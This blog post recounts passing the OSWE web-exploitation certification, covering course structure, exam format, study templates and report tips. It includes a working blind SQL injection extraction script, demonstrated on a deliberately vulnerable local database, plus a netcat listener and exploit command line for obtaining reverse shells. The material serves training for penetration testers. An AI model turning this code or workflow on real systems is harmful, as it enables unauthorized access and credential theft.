Last year (2023) I successfully passed the OSWE exam and obtained the certification. In this post, I will talk about my experience with the exam and also the related course (WEB-300). I will also discuss how I was able to pass it on my first try, as well as additional preparation you could do before taking the course.
What is WEB-300 and OSWE?
The best place to answer those questions is definitely OffSec’s website. That being said, here is the gist of it.
What is WEB-300?
- The course and labs that will prepare you for the OSWE exam.
- It contains the necessary theory (knowledge).
- Almost every chapter in the course has a set of exercises to complete.
- Almost every chapter also has extra mile exercises.
- Unlike OSCP, you do not get bonus points for the exam by completing exercises and machines.
What is the OSWE Exam?
- A 48-hour exam (The timer does not stop. You are expected to eat, sleep, take breaks, etc.).
- You have a certain number of machines that you need to compromise (a web app and the underlying server).
- This is a white box-style exam, meaning you have access to the source code of the web applications.
- Multiple vulnerabilities will have to be chained to reach your goals.
- You have to automate the exploitation of a given machine in a single program.
- You then have another 24 hours to write and submit a professional report. Fail to do so and you will fail the exam (even if you hacked all the exam machines). It is very important, again, to read the exam guide.
I will go deeper into both the course and the exam in the following sections.
Why OSWE?
As I mentioned in my OSCP post, you should always ask yourself the following questions before working on any certification:
- Why do you want to do it?
- What will it bring you?
This is highly personal, but here is a short (incomplete) list of why one should do the WEB-300 course and the OSWE exam:
- Learn, apply, chain, and automate advanced web application exploits
- Certify you as an expert in web application pentesting
- Pass the HR gating when looking for a job
- Obtain the OSCE3 certification, since you need to achieve OSWE, OSED, and OSEP to get it
- And more …
As you may already know, this course and certification are meant for pentesters or red teamers. If this is not what you want to do, there is probably a better certification for your career goal (see https://pauljerimy.com/security-certification-roadmap/ for some guidance).
Prerequisites
Since it is an expert-level certification, some prerequisites are expected. Here is what I consider must-haves before jumping into the course:
- Know how to generate reverse shells for both Linux and Windows, using different techniques (ELF-based, PHP-based, PowerShell-based, bash-based, etc.)
- The course will not teach you how to make reverse shells, so you will have to bring this to the table.
- Be able to easily read code, even a programming language that you do not know at all or just a little
- You will have to be able to quickly find vulnerabilities in a web application using both the source code and the behavior of the app. Be ready to read a lot of code.
- Have already exploited all the vulnerabilities presented in the course (even if only a simple version). See the public syllabus of the course.
- I think having done that will help you concentrate on the advanced concepts and how to find the vulnerabilities. Otherwise, you would have to also learn how prototype pollution works, for example.
- Be relatively fluent in Python scripting
- You will have to automate the exploitation of the machines. Even though you could use any programming language of your choice, I recommend using Python like in the course. This is what most security practitioners use anyway, and it is a pretty solid choice.
Here are things that I consider nice to have before jumping into the course:
- Have gone through a 200-level course and exam from OffSec
- Having completed a 24-hour OffSec exam, you would have a better understanding of what is to come in a 48-hour exam.
- Have exploited advanced versions of some of the vulnerabilities presented in the course (e.g.: manual blind SQL injection)
- This would help streamline the course and focus on finding the vulnerabilities, how to chain them, and automate the exploitation.
The last “prerequisite” I want to mention is tackling this certification with a networking background vs. a programming background. It should not come as a surprise that having a programming background is a huge advantage. Having that background myself, I was already efficient in how I read and understand the code base of an unknown application. I just had to adapt my technique a little. I would argue that any decent programmer could successfully take on this certification. This also means that someone with a “pure” networking background would likely have to work harder. I can tell you that taking this course without any previous experience is going to be tough. I am not saying that to discourage you, I want you to be prepared (more on that later).
One question that is often asked is “Should I do OSCP before OSWE?” or “Should I do OSWA before OSWE?”. My short answer to this is no, you do not have to. Those are not prerequisites to pass OSWE. Would that help? Probably, especially regarding the exam experience, but that’s it.
The Course
Each chapter is a case study of a vulnerable application, most of them are real-world applications that had exploits found in previous versions. Each case study presents new concepts and/or pushes a previously covered concept further. It goes without saying that everything you learn in the course could be part of your exam.
In each chapter, you have exercises and extra mile exercises, which you have to complete against a vulnerable target. If you want to maximize your chances of success in the exam, you have to complete both. The exercises are mandatory to follow along with the explanation, and you can easily get help from the community on Discord. The extra miles are exercises that push things further, where no help is provided by the course. These exercises are the most important and you should take the time to complete them by yourself; you will get better value out of them. Note that on my side, I completed all the course material and related exercises first, then went through it again to complete the extra mile exercises. It worked great for me; ask yourself whether this would be a good strategy for you.
Like for any course you take, taking good notes is very important. One thing I did that was really useful for the exam is that, on top of detailed notes, I also created cheat sheets as I progressed. Specifically, I created an Xmind. In this Xmind, I created a sheet for each programming language and DBMS covered in the course. I then created a mind map of all the vulnerabilities that are specific to a given programming language, and how to find/exploit them. If more details were needed, I referenced my detailed notes. I also created one Xmind sheet for vulnerabilities that are more “common” across the covered languages (e.g.: XXE).
The last important thing, and I think it is crucial, is that you should create code templates. As you go through the course, you will create different scripts to automate exploits. Transforming these scripts or methods into templates that can be easily reused during the exam will save you a lot of time. As an example, during my exam, I was able to copy-paste a lot of code from my templates and adapt it a bit, which saved me a lot of time. Here is an overview of my template structure:
As you can see, I have separated my templates by vulnerabilities/”themes”. They are then further separated by programming language or DBMS, if applicable. Each template has a self-describing name and an explanation at the top on how to use it, because in an exam context you want to quickly figure out how a particular template can be used and in what context. I also make sure that the code is clean and easy to read and understand. Note that my templates are not necessarily valid code, since they may contain placeholders. This is a simple example to get a basic SQL injection automation started:
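As an added example of what such a template can look like (this is not the author's template), here is a boolean-based blind SQL injection extractor whose only coupling to the target is an oracle callback, so the same class can be reused across exam targets by swapping the callback. To keep it runnable offline, the target is a constructed in-memory SQLite application with a deliberately injectable login query; the `users` table, its columns and the credentials are made up for the demo. Against a real target, the oracle would wrap `requests` and test the response for the "true" signature (status code, a page marker, or timing).

```python
import sqlite3
from typing import Callable


class BlindSQLi:
    """Boolean-based blind SQL injection extractor.

    oracle(condition) injects the SQL condition into the vulnerable parameter and
    returns True when the application behaves as if the condition were true.
    """

    def __init__(self, oracle: Callable[[str], bool],
                 ord_fn: str = "UNICODE", substr_fn: str = "SUBSTR"):
        self.oracle = oracle
        # SQLite: UNICODE/SUBSTR. MySQL/PostgreSQL: ASCII/SUBSTR. MSSQL: ASCII/SUBSTRING.
        self.ord_fn = ord_fn
        self.substr_fn = substr_fn
        self.requests_sent = 0

    def check(self, condition: str) -> bool:
        self.requests_sent += 1
        return self.oracle(condition)

    def length(self, query: str, max_len: int = 64) -> int:
        """Binary-search LENGTH() of the scalar returned by query (0..max_len)."""
        lo, hi = 0, max_len
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if self.check(f"LENGTH(({query})) >= {mid}"):
                lo = mid
            else:
                hi = mid - 1
        return lo

    def extract(self, query: str) -> str:
        """Recover the string returned by query, one character at a time.

        Binary search over printable ASCII (32..126) costs about 7 requests per
        character instead of up to 95 with a linear charset scan.
        """
        result = ""
        for pos in range(1, self.length(query) + 1):
            lo, hi = 32, 126
            while lo < hi:
                mid = (lo + hi) // 2
                cond = f"{self.ord_fn}({self.substr_fn}(({query}),{pos},1)) > {mid}"
                if self.check(cond):
                    lo = mid + 1
                else:
                    hi = mid
            result += chr(lo)
        return result


def make_vulnerable_login() -> Callable[[str], bool]:
    """Constructed stand-in for a target: an in-memory SQLite app whose login
    concatenates the username straight into the query (injectable on purpose)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "S3cr3t_P@ss!"), ("bob", "hunter2")])
    db.commit()

    def login(username: str) -> bool:
        sql = f"SELECT id FROM users WHERE username = '{username}'"  # vulnerable on purpose
        return db.execute(sql).fetchone() is not None

    return login


def dump_admin_password(login: Callable[[str], bool]) -> str:
    """Template entry point: wire the injection point to the oracle and extract."""
    # The injected condition is appended after a known-good username; "-- " comments
    # out the closing quote of the original query.
    sqli = BlindSQLi(oracle=lambda cond: login(f"admin' AND {cond} -- "))
    return sqli.extract("SELECT password FROM users WHERE username = 'admin'")


if __name__ == "__main__":
    login = make_vulnerable_login()
    print("[INFO] admin password:", dump_admin_password(login))
```

During the exam, the two things that change per target are the oracle (how you send the condition and how you tell true from false) and the `ord_fn`/`substr_fn` pair for the DBMS in play; the search logic and the request accounting stay the same, which is exactly what makes a template worth keeping.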
I also created a simple Python cheat sheet for small code snippets that can be useful but do not warrant a full code template. I separated everything into different categories like text manipulation or file manipulation. This cheat sheet has been extremely useful during the exam as well. For example (in markdown):
### Authentication
Basic:
```python
import requests
from requests.auth import HTTPBasicAuth

# Placeholders: fill in the credentials and target URL of the engagement.
basic = HTTPBasicAuth("<USER>", "<PASSWORD>")
r = requests.post("<URL>", auth=basic)
```
Username and password in form:
```python
import sys
import requests


def login(target, username, password):
    """Log in through the form and return the authenticated session."""
    url = "http://%s/login" % target
    data = {"username": username, "password": password}
    s = requests.Session()
    r = s.post(url, data=data)
    # Placeholder: the message the application returns on a failed login.
    if "<Login Failed Error Message>" in r.text:
        print("[ERROR] Login Failed")
        sys.exit(1)
    print("[INFO] Login Successful")
    return s
```
At the end of the course, you are presented with the lab. Unlike OSCP, there are only a few machines for you to practice on. That said, some machines have more than one way to exploit them. You should consider those few machines more as exam preparation rather than “only” a lab. Indeed, the approach to attack those machines is the same as what you will have to do in the exam: start without any access to the target, get authenticated access to the web application, elevate your privileges to administrator of the web application, obtain a reverse shell on the server. Because of that, you should avoid using Discord to help you with those machines. On my side, I only used the Discord community to confirm that I had found all the possible exploits on a given target. On top of exploiting the targets, it is important to automate the whole exploitation chain as you would do for the exam. Finally, note that you should tackle those machines only after completing the course, the exercises, and the extra miles. This is the best way to prepare for the exam.
The Exam
The exam overall experience is relatively similar to the OSCP exam; in the exam panel, you will have a list of machines to compromise and the respective objectives to complete. Generally speaking, you will need to (still, confirm this by reading the objectives):
- Gain admin privileges on the target website from an unauthenticated user (you may need to gain low-privilege access and perform privilege escalation)
- Gain a reverse shell on the underlying server (no need to perform privilege escalation after that)
- Automate the entire exploitation
Since this is a white box testing certification, you will also have access to a debug machine running a version of the target web app that you have to exploit. You will also find the source code of the target application there, which you will be able to run a debugger against. Note that any secrets that may or may not be useful in exploiting the target web application are not the same between the debug version and the target version. Having access to the source code can be misleading for some, because it does not make the exam easier. You need to be able to quickly identify potential vulnerabilities and confirm that they can be used to achieve your goal. In other words, be careful of potential rabbit holes. On top of that, you will most likely need to chain multiple vulnerabilities in order to achieve a given objective on a target. One last thing about the source code: you may need to exploit, in another language, something that you learned in the course (unless it is language-specific, of course). For example, if they showed how to find blind SQL injections only in C#, you may have to find and exploit one in a NodeJS app.
Once you have found the chain of exploits needed to reach your goal, make sure to take lots of screenshots. In the report, you will need to be able to re-enact your thought process and demonstrate the chain of vulnerabilities in the code. You will also need to provide the necessary proof of exploitation in the report and the exam panel (see your objectives for more details). An important note: you can’t download the source code of the app present in the provided VM (but you can screenshot the relevant parts).
After you have achieved your exploitation goals and taken all the necessary screenshots, it is time to automate the exploitation chain. You will not get any points if you do not do that. What they mean by automate is simply that all you need to do to obtain a reverse shell on the target, is run a (Python) script. For example:
- Start a netcat listener:
```bash
nc -lnvp 4444
```
- Run the exploit:
```bash
python exploit.py target-ip attacker-ip attacker-port
```
Your code should be easy to understand for the reviewers since you will need to provide the source code of your automated scripts in the report. If you were only able to achieve parts of the objectives, you need to automate the exploit up to that point (and probably print back the proof in the script output).
This is a 48-hour exam, as such, it is more of a marathon compared to OSCP. You can’t survive if you do not sleep. I would argue that if you could not achieve the necessary objectives to pass the exam in less than 20 hours of active exam, you were not ready. As always, you are expected to eat, sleep, take breaks, etc. Like my OSCP certification, I gave myself a schedule that I pretty much followed. This forced me to take breaks when I should. I highly recommend that you make one before the exam. This is highly personal and one’s schedule may not work for another’s, but here is the schedule I used for reference.
- Day 1 – (10 to 12 hours of active exam time):
- 1 pm to 6 pm approx. Could be 5 pm
- Dinner
- 7 pm (or 6 pm) to midnight approx. (extend to 2 am max)
- Sleep
- Day 2 – (14 to 16 hours of active exam time):
- 8 am to 12 pm approx. (can start earlier if possible, depending on when you stopped)
- Lunch
- 1 pm to 6 pm approx. Could be 5 pm
- Dinner
- 7 pm (or 6 pm) to midnight approx. (extend to 2 am max)
- Sleep
- Day 3 – Wrap up (5 hours – 8 hours of active exam time):
- 8 am to 1 pm
- Take breaks every 2-3 hours (except maybe the first afternoon block).
- Do not spend more than 2 hours on a given access level without making progress. Take a break, switch targets, etc. Change your mindset.
- Take regular snapshots of the Kali VM in case of any issues
I got a passing score in the morning on the second day. I used the last day to go over all of my notes and material to:
- Make sure I fulfill the objectives
- Make sure that my automated scripts are easy to read and work perfectly
- I have all the necessary screenshots
- I have all the necessary commands to describe how to exploit the targets manually
- Etc.
There are multiple little things that you will not want to forget during the exam. This is why I created my own checklists. This is by no means necessary, but I highly recommend it. I had a checklist for:
- Before the Exam Checklist
- Day of the Exam Checklist
- During the Exam Checklist
- Analysis Checklist
- Vulnerability Checklist
- Before Finishing the Exam Checklist
- Report Checklist
With that done, it is time to move on to the report.
The Report
Just like OSCP, if you do not provide a report within the 24 hours following the end of the exam, you will not get the certification. As with most, if not all, OffSec certifications, they provide a report template. I advise that you use it, or at least use a similar approach. The report has specific requirements that you must ensure you meet (again, the exam guide is your friend here). That being said, here is how I structured my report regarding the machines themselves:
- Local.txt / Proof.txt
- Start with the content of those files
- Authentication Bypass – <VULNERABILITY NAME>
- How I gained unauthorized access to the web application
- Privilege Escalation – <VULNERABILITY NAME>
- How I gained admin access if needed
- Reverse Shell – <VULNERABILITY NAME>
- How I gained a reverse shell
- PoC Code
- The code used to automate the exploitation of the target
- Screenshots
- Screenshots of local.txt and proof.txt
- Steps
- This is where I went deep into: how I found the vulnerabilities (thought process), how the payloads reach the vulnerabilities (with code screenshots), and how to exploit everything manually.
The person who will review your report will copy-paste your PoC code and run it to make sure that it works. You may already know that copy-pasting code from PDFs can be a pain. For example, you will most likely lose the code indentation in the process, which is less than ideal for Python code. To solve that issue, I provided all my code in base64 format in annexes at the end of the report (making sure to reference them). This ensured that the reviewer had an easy way to copy the code of the PoC (with the necessary instructions to do it).
All in all, the report was relatively quick and easy to write for me. All I had to do was transform all my dirty notes into something professional. If you took good notes and screenshots as you went on with the exam, it will probably be straightforward.
Additional Preparation
Here are some resources for additional preparation for WEB-300 and OSWE.
Web Exploitation:
Python:
- Any introduction course on PluralSight, if you have access (can have a 10-day trial for free if I am not mistaken)
- W3 Schools
- Python’s site itself
- Many others
Reverse shell:
OSWE-Like machines:
- YouTube Playlist of Relevant Hack the Box machines. I have not used it myself, but it looks like a good place to start.
Last Thoughts
The course WEB-300 and the OSWE exam mix well together because they provide different values both for you and your employer or clients. Completing the WEB-300 course (and its labs) will give you practical knowledge. Passing the OSWE exam will prove that you can work in a stressful environment, that you are efficient, etc.
As mentioned previously, taking on this certification without any prior experience is going to be rough. A common question that gets asked is “How difficult is it compared to OSCP”? Well, it is an expert-level certification, and OSCP is an intermediate one. That alone should give you a hint. For me, it was pretty much smooth sailing from start to finish, but I had a head start regarding web exploitation, coding, and reading code. In the end, it took me less than 6 months to complete the course and pass the exam (with a full-time job and a family).
Since this is a 48-hour exam (72 if you count the report), it can be difficult for someone with a family. If you want my take on how to keep a balance between work, life, family, and studying for a certification, please take a look at my OSCP post here.
In the end, I am really satisfied with this certification as it sharpened my skills to a new level for web application pentests.
Hopefully, this was useful for you. Otherwise, thanks for reading this long post :).